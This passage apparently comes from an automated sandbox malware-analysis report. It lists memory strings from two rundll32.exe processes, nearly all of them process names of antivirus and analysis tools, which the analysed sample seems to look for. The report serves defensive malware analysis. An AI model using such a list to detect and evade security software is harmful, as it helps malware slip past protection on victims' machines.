0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: kvsrvxp.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CUREIT.exe
    Source: rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012065404.0000025BF012E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387123364.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NMAIN.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsaua.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nod32krn.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pctsSvc.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089047921.0000025BF00E8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862282262.0000025BF00E5000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: avgupd.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414881638.0000025BEE292000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: kavstart.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: processmonitor.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWUPDSV.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UmxPol.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVGUPSVC.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387123364.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MCVSSHLD.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861533714.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562924841.0000025BF0130000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ashdisp.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088610386.0000025BF012D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PsCtrlS.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: lordpe.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ALsvc.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487898021.0000025BF00EF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488163764.0000025BF00FF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: spf.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862282262.0000025BF00E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SAVAdminService.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: spiderml.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ashmaisv.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SpIDerAgent.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521925258.0000025BF009A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE267000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SPIDERNT.EXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcagent.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ALMon.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935104556.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: avgrsx.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: kvmonxp.kxp
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CLAMTRAY.exe
    Source: rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: portdetective.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164057570.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdss.exe
    Source: rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ACAIS.exe
